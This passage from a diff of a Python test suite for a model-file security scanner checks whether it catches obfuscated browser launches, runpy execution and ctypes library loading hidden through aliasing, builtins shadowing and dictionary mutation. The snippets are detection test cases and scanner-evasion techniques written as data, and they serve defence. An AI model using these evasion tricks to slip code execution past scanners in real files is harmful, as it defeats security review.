builtins\nimport webbrowser as wb\n" + b"(builtins, wb.open) = (object(), builtins.print)\n" + b"wb.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_uses_preassignment_builtin_value_in_destructuring", + ), + pytest.param( + b"from webbrowser import open as opener\n" + b"if condition:\n opener = print\nelse:\n opener = print\n" + b"opener('safe')\n", + "Web browser launch detected", + id="test_scan_model_clears_callable_alias_overwritten_in_all_branches", + ), + pytest.param( + b"import builtins\nimport webbrowser as wb\n" + b"original_print = builtins.print\n" + b"builtins.print = input\n" + b"builtins.print = original_print\n" + b"wb.open = builtins.print\nwb.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_accepts_restored_original_builtin_print", + ), + pytest.param( + b"import builtins\nimport builtins as bi\nimport webbrowser as wb\n" + b"if condition:\n bi = builtins\n" + b"wb.open = bi.print\nwb.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_accepts_uncertain_builtin_to_builtin_alias_rebinding", + ), + pytest.param( + b"import builtins\nimport webbrowser as wb\n" + b"if condition:\n print = input\n print = builtins.print\n" + b"wb.open = print\nwb.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_accepts_branch_local_builtin_print_restoration", + ), + pytest.param( + b"import builtins\nimport webbrowser as wb\n" + b"if condition:\n captured = builtins.print\n" + b"else:\n captured = builtins.print\n" + b"wb.open = captured\nwb.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_accepts_safe_print_alias_assigned_on_every_branch", + ), + pytest.param( + b"import webbrowser as wb\n" + b"put = dict.setdefault\n" + b"del wb.open\n" + b"put(wb.__dict__, 'open', print)\n" + b"wb.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_tracks_dict_setdefault_alias_for_typed_member_restore", + ), + pytest.param( + b"import runpy as rp\n[rp.__dict__.update(run_path=print) for _ in [0]]\nrp.run_path('payload.py')\n", + "Dynamic module execution detected", + id="test_scan_model_replays_definitely_executed_comprehension_runpy_write", + ), + pytest.param( + b"import webbrowser as wb\noriginal = wb.open\nwb.open = print\n" + b"delattr = lambda *args: None\ndelattr(wb, 'open')\n" + b"wb.__dict__.setdefault('open', original)\nwb.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_ignores_shadowed_typed_delattr_before_setdefault", + ), + pytest.param( + b"import webbrowser as wb\noriginal = wb.open\nwb.open = print\n" + b"getattr = lambda *_args: {}\ngetattr(wb, '__dict__')['open'] = original\nwb.open('safe')\n", + "Web browser launch detected", + id="test_scan_model_ignores_shadowed_getattr_typed_mapping_restore", + ), + pytest.param( + b"import runpy as rp\nflag = False\n" + b"rp.__dict__.pop('run_path', None)\n" + b"flag and rp.__dict__.setdefault('run_path', print)\n" + b"rp.run_path('payload.py')\n", + "Dynamic module execution detected", + id="test_scan_model_ignores_conditional_safe_setdefault_after_unconditional_delete", + ), + ], + ) + def test_scan_model_suppresses_proven_safe_typed_member_overwrites( + self, source: bytes, expected_pattern: str + ) -> None: findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings + finding.type == "code_execution_pattern" and finding.pattern == expected_pattern for finding in findings ) - def test_scan_model_rejects_annotated_dict_update_alias_after_shadow(self) -> None: + def test_scan_model_keeps_original_alias_after_uncertain_try_star_rebind(self) -> None: + if not hasattr(ast, "TryStar"): + pytest.skip("except* requires Python 3.11+") source = ( - b"import webbrowser as wb\nclass Safe:\n" - b" @staticmethod\n def update(*args, **kwargs):\n pass\n" - b"dict = Safe\nupdate: object = dict.update\n" - b"update(wb.__dict__, open=print)\nwb.open('https://example.invalid')\n" + b"import webbrowser as wb\nactual = wb\ntry:\n wb = object()\n" + b"except* Exception:\n pass\nwb.open = print\nactual.open('https://example.invalid')\n" ) findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") @@ -7861,26 +7852,40 @@ def test_scan_model_rejects_annotated_dict_update_alias_after_shadow(self) -> No for finding in findings ) - def test_scan_model_preserves_safe_overwrite_across_sys_modules_setdefault(self) -> None: + @pytest.mark.parametrize( + "dict_shadow", + [ + b"builtins.__dict__.update(dict=Safe)\n", + b"setattr(builtins, 'dict', Safe)\n", + ], + ) + def test_scan_model_rejects_dict_update_after_builtin_dict_shadow(self, dict_shadow: bytes) -> None: source = ( - b"import sys, webbrowser as wb\nwb.open = print\n" - b"sys.modules.setdefault('webbrowser', object())\n" - b"import webbrowser as wb2\nwb2.open('safe')\n" + b"import builtins, webbrowser as wb\n" + b"class Safe:\n @staticmethod\n def update(*args, **kwargs):\n pass\n" + + dict_shadow + + b"dict.update(wb.__dict__, open=print)\nwb.open('https://example.invalid')\n" ) findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - assert not any( + assert any( finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" for finding in findings ) - def test_scan_model_invalidates_safe_overwrite_across_sys_modules_setitem(self) -> None: - source = ( - b"import sys, webbrowser as wb\nwb.open = print\n" - b"sys.modules.__setitem__('webbrowser', object())\n" - b"import webbrowser as wb2\nwb2.open('https://example.invalid')\n" - ) + @pytest.mark.parametrize( + "shadow_statement", + [ + b"(vars := lambda _value: {})\nvars(wb).update(open=print)\n", + b"((setattr := lambda *args: None), setattr(wb, 'open', print))\n", + ], + ) + def test_scan_model_rejects_safe_overwrite_through_walrus_shadowed_helper( + self, + shadow_statement: bytes, + ) -> None: + source = b"import webbrowser as wb\n" + shadow_statement + b"wb.open('https://example.invalid')\n" findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") @@ -7889,6 +7894,26 @@ def test_scan_model_invalidates_safe_overwrite_across_sys_modules_setitem(self) for finding in findings ) + @pytest.mark.parametrize( + "alias_statement", + [ + b"update: object = dict.update\nupdate(wb.__dict__, open=print)\n", + b"mapping_type: object = dict\nmapping_type.update(wb.__dict__, open=print)\n", + ], + ) + def test_scan_model_allows_safe_overwrite_through_annotated_dict_helper_alias( + self, + alias_statement: bytes, + ) -> None: + source = b"import webbrowser as wb\n" + alias_statement + b"wb.open('safe')\n" + + findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") + + assert not any( + finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" + for finding in findings + ) + @pytest.mark.parametrize( ("future_import", "should_detect"), [(b"", True), (b"from __future__ import annotations\n", False)], @@ -7934,16 +7959,6 @@ def test_scan_model_keeps_class_local_module_alias_state( assert detected is should_detect - def test_scan_model_ignores_safe_class_local_module_alias_call(self) -> None: - source = b"import webbrowser as wb\nclass C:\n wb = object()\n wb.open = print\n wb.open('safe')\n" - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - @pytest.mark.parametrize( ("source", "expected_pattern"), [ @@ -7983,38 +7998,7 @@ def test_scan_model_keeps_call_after_module_class_mutation( source: bytes, expected_pattern: str, ) -> None: - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == expected_pattern for finding in findings - ) - - def test_scan_model_ignores_unrelated_object_class_mutation_before_safe_overwrite(self) -> None: - source = ( - b"import webbrowser as wb\nclass Base:\n pass\nclass Trap(Base):\n pass\n" - b"holder = Base()\nholder.__class__ = Trap\nwb.open = print\nwb.open('safe')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_allows_safe_overwrite_on_fresh_module_generation_after_class_mutation(self) -> None: - source = ( - b"import webbrowser as old, types, sys\nclass Trap(types.ModuleType):\n pass\n" - b"old.__class__ = Trap\ndel sys.modules['webbrowser']\nimport webbrowser as fresh\n" - b"fresh.open = print\nfresh.open('safe')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) + _assert_typed_member_detected(source, expected_pattern) def test_scan_model_keeps_cross_candidate_webbrowser_member_after_safe_call(self) -> None: detector = JITScriptDetector() @@ -8044,12 +8028,7 @@ def test_scan_model_keeps_restored_runpy_member_after_safe_call(self) -> None: + padding ) - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, data, "payload.bin", "Dynamic module execution detected") def test_scan_model_keeps_runpy_alias_captured_before_safe_overwrite(self) -> None: detector = JITScriptDetector() @@ -8092,12 +8071,7 @@ def test_scan_model_keeps_runpy_alias_captured_before_safe_overwrite(self) -> No def test_scan_model_keeps_runpy_calls_when_safe_overwrite_helpers_are_shadowed(self, data: bytes) -> None: detector = JITScriptDetector() - findings = detector.scan_model(data, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, data, "payload.py", "Dynamic module execution detected") @pytest.mark.parametrize("method", [b"pop", b"__delitem__"]) def test_scan_model_keeps_runpy_call_after_shadowed_dict_descriptor_delete(self, method: bytes) -> None: @@ -8238,12 +8212,7 @@ def test_scan_model_keeps_constant_active_runpy_capture(self) -> None: b"import runpy as rp\nif True:\n captured = rp.run_path\nrp.run_path = print\ncaptured('payload.py')\n" ) - findings = detector.scan_model(data, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, data, "payload.py", "Dynamic module execution detected") def test_scan_model_keeps_runpy_call_after_destructured_member_restore(self) -> None: detector = JITScriptDetector() @@ -8252,23 +8221,13 @@ def test_scan_model_keeps_runpy_call_after_destructured_member_restore(self) -> b"(rp.run_path,) = (original,)\nrp.run_path('payload.py')\n" ) - findings = detector.scan_model(data, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, data, "payload.py", "Dynamic module execution detected") def test_scan_model_ignores_destructured_safe_runpy_overwrite(self) -> None: detector = JITScriptDetector() data = b"import runpy as rp\nrp.run_path = print\n(rp.run_path,) = (print,)\nrp.run_path('safe')\n" - findings = detector.scan_model(data, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_without_pattern(detector, data, "payload.py", "Dynamic module execution detected") def test_scan_model_uses_explicit_builtins_setattr_after_local_shadow(self) -> None: detector = JITScriptDetector() @@ -8277,23 +8236,13 @@ def test_scan_model_uses_explicit_builtins_setattr_after_local_shadow(self) -> N b"builtins.setattr(rp, 'run_path', print)\nrp.run_path('safe')\n" ) - findings = detector.scan_model(data, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_without_pattern(detector, data, "payload.py", "Dynamic module execution detected") def test_scan_model_ignores_overwritten_runpy_capture(self) -> None: detector = JITScriptDetector() data = b"import runpy as rp\ncaptured = rp.run_path\ncaptured = print\nrp.run_path = print\ncaptured('safe')\n" - findings = detector.scan_model(data, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_without_pattern(detector, data, "payload.py", "Dynamic module execution detected") def test_scan_model_keeps_propagated_runpy_capture_before_safe_overwrite(self) -> None: detector = JITScriptDetector() @@ -8301,23 +8250,13 @@ def test_scan_model_keeps_propagated_runpy_capture_before_safe_overwrite(self) - b"import runpy as rp\ncaptured = rp.run_path\nrelay = captured\nrp.run_path = print\nrelay('payload.py')\n" ) - findings = detector.scan_model(data, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, data, "payload.py", "Dynamic module execution detected") def test_annotation_only_preserves_runpy_capture(self) -> None: detector = JITScriptDetector() data = b"import runpy as rp\nrunner = rp.run_path\nrunner: object\nrp.run_path = print\nrunner('payload.py')\n" - findings = detector.scan_model(data, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, data, "payload.py", "Dynamic module execution detected") @pytest.mark.parametrize( "data", @@ -8342,16 +8281,6 @@ def test_nested_print_parameter_does_not_shadow_module_builtin(self) -> None: assert not jit_script_module._compact_snippet_has_shadowed_print(source) assert jit_script_module._compact_snippet_runpy_print_overwrite_calls(source) == {("runpy.run_path", "S108")} - def test_scan_model_preserves_safe_runpy_overwrite_before_print_shadow(self) -> None: - source = b"import runpy as rp\nrp.run_path = print\nprint = eval\nrp.run_path('safe')\n" - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) - @pytest.mark.parametrize( "print_shadow", [ @@ -8361,24 +8290,14 @@ def test_scan_model_preserves_safe_runpy_overwrite_before_print_shadow(self) -> ], ) def test_scan_model_preserves_safe_runpy_overwrite_before_mapping_print_shadow( - self, - print_shadow: bytes, - ) -> None: - source = b"import runpy as rp\nrp.run_path = print\n" + print_shadow + b"rp.run_path('safe')\n" - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) - - def test_scan_model_rejects_runpy_overwrite_after_print_shadow(self) -> None: - source = b"import runpy as rp\nprint = eval\nrp.run_path = print\nrp.run_path('payload.py')\n" + self, + print_shadow: bytes, + ) -> None: + source = b"import runpy as rp\nrp.run_path = print\n" + print_shadow + b"rp.run_path('safe')\n" findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - assert any( + assert not any( finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" for finding in findings ) @@ -8455,13 +8374,7 @@ def test_scan_model_keeps_typed_call_after_other_owner_safe_overwrite( source: bytes, expected_pattern: str, ) -> None: - detector = JITScriptDetector() - - findings = detector.scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == expected_pattern for finding in findings - ) + _assert_typed_call_detected(source, expected_pattern) @pytest.mark.parametrize( "binding", @@ -8535,35 +8448,19 @@ def test_scan_model_keeps_typed_call_after_mapping_alias_reassignment( source: bytes, expected_pattern: str, ) -> None: - detector = JITScriptDetector() - - findings = detector.scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == expected_pattern for finding in findings - ) + _assert_typed_call_detected(source, expected_pattern) def test_scan_model_keeps_runpy_call_after_module_alias_reassignment(self) -> None: detector = JITScriptDetector() data = b"import runpy as rp\nactual = rp\nrp = object()\nrp.run_path = print\nactual.run_path('payload.py')\n" - findings = detector.scan_model(data, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, data, "payload.py", "Dynamic module execution detected") def test_scan_model_preserves_safe_runpy_alias_after_other_alias_reassignment(self) -> None: detector = JITScriptDetector() data = b"import runpy as rp\nactual = rp\nactual.run_path = print\nrp = object()\nactual.run_path('safe')\n" - findings = detector.scan_model(data, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_without_pattern(detector, data, "payload.py", "Dynamic module execution detected") def test_scan_model_keeps_runpy_call_after_possible_alias_reassignment(self) -> None: detector = JITScriptDetector() @@ -8572,12 +8469,7 @@ def test_scan_model_keeps_runpy_call_after_possible_alias_reassignment(self) -> b"rp.run_path = print\nrunpy.run_path('payload.py')\n" ) - findings = detector.scan_model(data, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, data, "payload.py", "Dynamic module execution detected") def test_scan_model_keeps_runpy_call_after_import_context_alias_reassignment(self) -> None: detector = JITScriptDetector() @@ -8589,12 +8481,7 @@ def test_scan_model_keeps_runpy_call_after_import_context_alias_reassignment(sel + padding ) - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_pattern(detector, data, "payload.bin", "Dynamic module execution detected") @pytest.mark.parametrize( ("source", "expected_pattern"), @@ -8614,13 +8501,7 @@ def test_scan_model_keeps_typed_call_before_safe_overwrite( source: bytes, expected_pattern: str, ) -> None: - detector = JITScriptDetector() - - findings = detector.scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == expected_pattern for finding in findings - ) + _assert_typed_call_detected(source, expected_pattern) @pytest.mark.parametrize( ("source", "expected_pattern"), @@ -8647,35 +8528,19 @@ def test_scan_model_keeps_call_after_unproven_mapping_update( source: bytes, expected_pattern: str, ) -> None: - detector = JITScriptDetector() - - findings = detector.scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == expected_pattern for finding in findings - ) + _assert_typed_call_detected(source, expected_pattern) def test_scan_model_preserves_safe_runpy_member_after_trailing_static_update(self) -> None: detector = JITScriptDetector() data = b"import runpy as rp\nupdates = {}\nrp.__dict__.update(updates, run_path=print)\nrp.run_path('safe')\n" - findings = detector.scan_model(data, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_without_pattern(detector, data, "payload.py", "Dynamic module execution detected") def test_scan_model_ignores_restored_runpy_member_without_call(self) -> None: detector = JITScriptDetector() data = b"import runpy\noriginal = runpy.run_path\nrunpy.run_path = print\nrunpy.run_path = original\n" - findings = detector.scan_model(data, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_without_pattern(detector, data, "payload.py", "Dynamic module execution detected") def test_scan_model_ignores_stale_runpy_mapping_alias_reassignment(self) -> None: detector = JITScriptDetector() @@ -8684,12 +8549,7 @@ def test_scan_model_ignores_stale_runpy_mapping_alias_reassignment(self) -> None b"namespace = rp.__dict__\nnamespace = {}\nnamespace.update(run_path=original)\nrp.run_path('safe')\n" ) - findings = detector.scan_model(data, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_without_pattern(detector, data, "payload.py", "Dynamic module execution detected") @pytest.mark.parametrize( ("source", "expected_pattern"), @@ -8762,13 +8622,7 @@ def test_scan_model_keeps_call_after_module_reimport_or_reload( source: bytes, expected_pattern: str, ) -> None: - detector = JITScriptDetector() - - findings = detector.scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == expected_pattern for finding in findings - ) + _assert_typed_call_detected(source, expected_pattern) @pytest.mark.parametrize( "source", @@ -8956,13 +8810,7 @@ def test_scan_model_keeps_call_across_ordered_state_replay_edges( source: bytes, expected_pattern: str, ) -> None: - detector = JITScriptDetector() - - findings = detector.scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == expected_pattern for finding in findings - ) + _assert_typed_call_detected(source, expected_pattern) @pytest.mark.parametrize( ("future_import", "should_detect"), @@ -9013,20 +8861,6 @@ def test_runpy_replay_preserves_safe_state_for_deferred_annotation(self) -> None assert ("runpy.run_path", "S108") in suppressed - def test_scan_model_invalidates_safe_member_in_uncertain_branch(self) -> None: - source = ( - b"import webbrowser as wb\noriginal = wb.open\nwb.open = print\n" - b"if flag:\n wb.open = original\n" - b"((wb).open)('https://collector.evil')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - @pytest.mark.parametrize( ("restored_value", "should_detect"), [ @@ -9095,44 +8929,6 @@ def test_scan_model_tracks_typed_member_mapping_assignment( ) assert detected is should_detect - def test_scan_model_ignores_unrelated_mapping_assignment_after_typed_safe_overwrite(self) -> None: - source = ( - b"import webbrowser as wb\noriginal = wb.open\nwb.open = print\n" - b"other = {}\nother['open'] = original\nwb.open('safe')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_keeps_typed_call_imported_before_safe_overwrite(self) -> None: - source = ( - b"from webbrowser import open as opener\n" - b"import webbrowser as wb\n" - b"wb.open = print\n" - b"opener('https://example.invalid')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_suppresses_typed_call_imported_after_safe_overwrite(self) -> None: - source = b"import webbrowser as wb\nwb.open = print\nfrom webbrowser import open as opener\nopener('safe')\n" - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - @pytest.mark.parametrize("safe_print", [b"builtins.print", b"bi.print"]) def test_scan_model_accepts_builtin_print_typed_overwrite(self, safe_print: bytes) -> None: source = ( @@ -9148,50 +8944,6 @@ def test_scan_model_accepts_builtin_print_typed_overwrite(self, safe_print: byte for finding in findings ) - def test_scan_model_rejects_print_attribute_on_rebound_builtins_name(self) -> None: - source = ( - b"import builtins\nimport webbrowser as wb\n" - b"class Holder:\n print = input\n" - b"builtins = Holder\nwb.open = builtins.print\n" - b"wb.open('https://example.invalid')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_rejects_lazy_consumer_after_same_expression_builtins_rebind(self) -> None: - source = ( - b"import builtins as bi\nimport ctypes as c\n" - b"class Lazy:\n @staticmethod\n def list(values):\n return values\n" - b"((bi := Lazy), bi.list(c.__dict__.update(CDLL=print) for _ in [0]))\n" - b"loader = c.CDLL\nloader('libpayload.so')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Native library loading detected" - for finding in findings - ) - - def test_scan_model_keeps_alias_when_eager_generator_inner_iterable_is_empty(self) -> None: - source = ( - b"import builtins as bi\nimport ctypes as c\nloader = c.CDLL\n" - b"bi.list((loader := print) for _ in [0] for __ in [])\n" - b"loader('libpayload.so')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Native library loading detected" - for finding in findings - ) - @pytest.mark.parametrize( ("initial_state", "replacement", "should_detect"), [ @@ -9238,57 +8990,6 @@ def test_scan_model_replays_dangerous_eager_nested_generator_iterable_mutation(s for finding in findings ) - def test_scan_model_suppresses_safe_eager_nested_generator_iterable_mutation(self) -> None: - source = ( - b"import webbrowser as wb\nlist(x for _ in [0] for __ in (setattr(wb, 'open', print),))\nwb.open('safe')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_accepts_builtin_print_after_statically_empty_generator_walrus(self) -> None: - source = b"import ctypes as c\nunused = ((print := eval) for _ in [])\nc.CDLL = print\nc.CDLL('safe')\n" - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Native library loading detected" - for finding in findings - ) - - def test_scan_model_keeps_dangerous_import_after_uncertain_member_restore(self) -> None: - source = ( - b"import webbrowser as wb\noriginal = wb.open\nwb.open = print\n" - b"from webbrowser import open as opener\n" - b"if condition:\n wb.open = original\n from webbrowser import open as opener\n" - b"opener('https://example.invalid')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_rejects_uncertain_builtin_print_helper_mutation(self) -> None: - source = ( - b"import builtins\nimport webbrowser as wb\noriginal = wb.open\n" - b"if condition:\n setattr(builtins, 'print', original)\n" - b"wb.open = builtins.print\nwb.open('https://example.invalid')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - @pytest.mark.parametrize( "mutation", [ @@ -9305,27 +9006,7 @@ def test_scan_model_rejects_overwrite_from_mutated_builtin_print(self, mutation: b"wb.open('https://example.invalid')\n" ) - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_accepts_self_assignment_of_builtin_print(self) -> None: - source = ( - b"import builtins\nimport webbrowser as wb\n" - b"builtins.print = builtins.print\n" - b"wb.open = builtins.print\n" - b"wb.open('safe')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) + _assert_jit_scan_pattern(JITScriptDetector(), source, "payload.py", "Web browser launch detected") @pytest.mark.parametrize( ("setup", "default"), @@ -9352,20 +9033,6 @@ def test_scan_model_ignores_safe_builtin_print_setdefault(self, setup: bytes, de for finding in findings ) - def test_scan_model_accepts_safe_else_after_uncertain_typed_alias_rebind(self) -> None: - source = ( - b"import webbrowser as wb\nwb.open = print\n" - b"if condition:\n wb = Holder\nelse:\n wb.open = print\n" - b"wb.open('safe')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - @pytest.mark.parametrize( ("setup", "target"), [ @@ -9376,32 +9043,18 @@ def test_scan_model_accepts_safe_else_after_uncertain_typed_alias_rebind(self) - ) def test_scan_model_rejects_failed_setattr_on_builtin_mapping(self, setup: bytes, target: bytes) -> None: source = ( - b"import builtins\nimport webbrowser as wb\nsafe_print = print\n" - b"original = wb.open\nbuiltins.print = original\n" - + setup - + b"try:\n setattr(" - + target - + b", 'print', safe_print)\nexcept AttributeError:\n pass\n" - b"wb.open = builtins.print\nwb.open('https://example.invalid')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_ignores_failed_dangerous_setattr_on_builtin_mapping(self) -> None: - source = ( - b"import builtins\nimport webbrowser as wb\noriginal = wb.open\n" - b"try:\n setattr(builtins.__dict__, 'print', original)\n" - b"except AttributeError:\n pass\nwb.open = builtins.print\nwb.open('safe')\n" + b"import builtins\nimport webbrowser as wb\nsafe_print = print\n" + b"original = wb.open\nbuiltins.print = original\n" + + setup + + b"try:\n setattr(" + + target + + b", 'print', safe_print)\nexcept AttributeError:\n pass\n" + b"wb.open = builtins.print\nwb.open('https://example.invalid')\n" ) findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - assert not any( + assert any( finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" for finding in findings ) @@ -9447,12 +9100,7 @@ def test_scan_model_respects_earlier_destructured_builtin_rebind(self, target: b b"wb.open = print\nwb.open('safe')\n" ) - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) + _assert_jit_scan_without_pattern(JITScriptDetector(), source, "payload.py", "Web browser launch detected") @pytest.mark.parametrize( ("setup", "assignment"), @@ -9481,20 +9129,6 @@ def test_scan_model_tracks_late_destructured_builtin_binding( for finding in findings ) - def test_scan_model_uses_preassignment_builtin_value_in_destructuring(self) -> None: - source = ( - b"import builtins\nimport webbrowser as wb\n" - b"(builtins, wb.open) = (object(), builtins.print)\n" - b"wb.open('safe')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - @pytest.mark.parametrize( "target", [ @@ -9508,26 +9142,7 @@ def test_scan_model_respects_chained_builtin_rebind_order(self, target: bytes) - b"wb.open = print\nwb.open('safe')\n" ) - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_tracks_builtin_mutation_before_chained_rebind(self) -> None: - source = ( - b"import builtins\nimport webbrowser as wb\noriginal = wb.open\n" - b"builtins.print = builtins = original\n" - b"wb.open = print\nwb.open('https://example.invalid')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) + _assert_jit_scan_without_pattern(JITScriptDetector(), source, "payload.py", "Web browser launch detected") def test_prefix_typed_member_aliases_ignore_scoped_capture(self) -> None: prefix = b"import webbrowser as wb\ndef unused():\n alias = wb.open\n" @@ -9619,14 +9234,7 @@ def test_prefix_alias_rebinding_fallback_handles_malformed_tail_lines(self) -> N assert "wb" not in typed_aliases def 